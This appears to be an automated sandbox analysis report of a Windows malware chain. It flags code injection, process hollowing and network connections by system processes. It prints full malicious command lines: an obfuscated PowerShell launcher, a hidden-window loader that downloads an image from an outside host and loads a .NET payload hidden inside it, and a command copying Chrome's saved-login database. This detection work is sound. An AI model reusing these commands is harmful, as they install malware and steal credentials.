Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AE5E7 mov eax, dword ptr fs:[00000030h] 5_2_013AE5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A95DA mov eax, dword ptr fs:[00000030h] 5_2_013A95DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014005A7 mov eax, dword ptr fs:[00000030h] 5_2_014005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014005A7 mov eax, dword ptr fs:[00000030h] 5_2_014005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014005A7 mov eax, dword ptr fs:[00000030h] 5_2_014005A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013865D0 mov eax, dword ptr fs:[00000030h] 5_2_013865D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BA5D0 mov eax, dword ptr fs:[00000030h] 5_2_013BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BA5D0 mov eax, dword ptr fs:[00000030h] 5_2_013BA5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FD5D0 mov eax, dword ptr fs:[00000030h] 5_2_013FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013FD5D0 mov ecx, dword ptr fs:[00000030h] 5_2_013FD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE5CF mov eax, dword ptr fs:[00000030h] 5_2_013BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE5CF mov eax, dword ptr fs:[00000030h] 5_2_013BE5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014135BA mov eax, dword ptr fs:[00000030h] 5_2_014135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014135BA mov eax, dword ptr fs:[00000030h] 5_2_014135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014135BA mov eax, dword ptr fs:[00000030h] 5_2_014135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_014135BA mov eax, dword ptr fs:[00000030h] 5_2_014135BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B55C0 mov eax, dword ptr fs:[00000030h] 5_2_013B55C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143F5BE mov eax, dword ptr fs:[00000030h] 5_2_0143F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0143F453 mov eax, dword ptr fs:[00000030h] 5_2_0143F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137C427 mov eax, dword ptr fs:[00000030h] 5_2_0137C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137E420 mov eax, dword ptr fs:[00000030h] 5_2_0137E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137E420 mov eax, dword ptr fs:[00000030h] 5_2_0137E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137E420 mov eax, dword ptr fs:[00000030h] 5_2_0137E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A340D mov eax, dword ptr fs:[00000030h] 5_2_013A340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B8402 mov eax, dword ptr fs:[00000030h] 5_2_013B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B8402 mov eax, dword ptr fs:[00000030h] 5_2_013B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013B8402 mov eax, dword ptr fs:[00000030h] 5_2_013B8402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0145547F mov eax, dword ptr fs:[00000030h] 5_2_0145547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AA470 mov eax, dword ptr fs:[00000030h] 5_2_013AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AA470 mov eax, dword ptr fs:[00000030h] 5_2_013AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013AA470 mov eax, dword ptr fs:[00000030h] 5_2_013AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381460 mov eax, dword ptr fs:[00000030h] 5_2_01381460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381460 mov eax, dword ptr fs:[00000030h] 5_2_01381460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381460 mov eax, dword ptr fs:[00000030h] 5_2_01381460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381460 mov eax, dword ptr fs:[00000030h] 5_2_01381460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01381460 mov eax, dword ptr fs:[00000030h] 5_2_01381460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h] 5_2_0139F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h] 5_2_0139F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h] 5_2_0139F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h] 5_2_0139F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h] 5_2_0139F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0139F460 mov eax, dword ptr fs:[00000030h] 5_2_0139F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013A245A mov eax, dword ptr fs:[00000030h] 5_2_013A245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01406420 mov eax, dword ptr fs:[00000030h] 5_2_01406420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0137645D mov eax, dword ptr fs:[00000030h] 5_2_0137645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h] 5_2_0138B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h] 5_2_0138B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h] 5_2_0138B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h] 5_2_0138B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h] 5_2_0138B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0138B440 mov eax, dword ptr fs:[00000030h] 5_2_0138B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h] 5_2_013BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h] 5_2_013BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h] 5_2_013BE443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013BE443 mov eax, dword ptr fs:[00000030h] 5_2_013BE443
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_000E1AC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_000E1AC3

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 172.67.187.200 443 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 203.161.57.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.95 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.33.130.190 80 Jump to behavior
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_3492.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: NULL target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread register set: target process: 2580 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 2580 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A1C008 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6BF500000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrezdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtregudgtrezdgtrebedgtregedgtreddgtrebhdgtrecdgtredgtrepqdgtregdgtreedgtredgtrekdgtredgtrepdgtredsdgtreidgtredgtrekdgtrehmdgtreadgtreb1dgtregydgtrezgbsdgtregudgtrezdgtrebmdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtreb8dgtrecdgtredgtrerwbldgtrehqdgtrelqbsdgtregedgtrebgbkdgtreg8dgtrebqdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrejdgtrebkdgtreg8dgtredwbudgtregwdgtrebwbhdgtregqd